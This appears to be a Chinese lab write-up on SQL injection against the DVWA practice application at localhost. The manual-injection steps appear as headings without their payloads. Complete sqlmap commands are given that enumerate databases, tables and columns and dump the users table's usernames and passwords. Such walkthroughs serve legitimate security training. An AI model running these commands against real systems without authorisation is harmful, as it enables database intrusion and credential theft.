具体原理及姿势参见:
【网络安全】DVWA之SQL注入—low level解题详析
【网络安全】DVWA之SQL注入—medium level解题详析
手工注入
判断注入类型


由以上两个回显可知,该注入类型为字符型注入。
判断注入点个数


由以上两个回显可知,注入点个数为两个。
爆库名

爆表名

爆列名

爆字段

sqlmap注入
查看是否存在注入点
python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/" --data "id=1"


存在注入点。
爆库名
python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/" --data "id=1" --dbs


爆表名
python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/" --data "id=1" -D dvwa --tables


爆列名
python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/" --data "id=1" -D dvwa -t users --columns


-D、-T为大写或小写均可
爆字段
python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/" --data "id=1" -D dvwa -T users -C user,password --dump


本文介绍了在DVWA环境中手工和使用sqlmap工具进行SQL注入的步骤,包括判断注入类型、确定注入点数量、爆库名、爆表名、爆列名和爆字段的过程。建议读者在理解SQL注入原理后,通过lowlevel和mediumlevel练习来准备。
288

被折叠的 条评论
为什么被折叠?



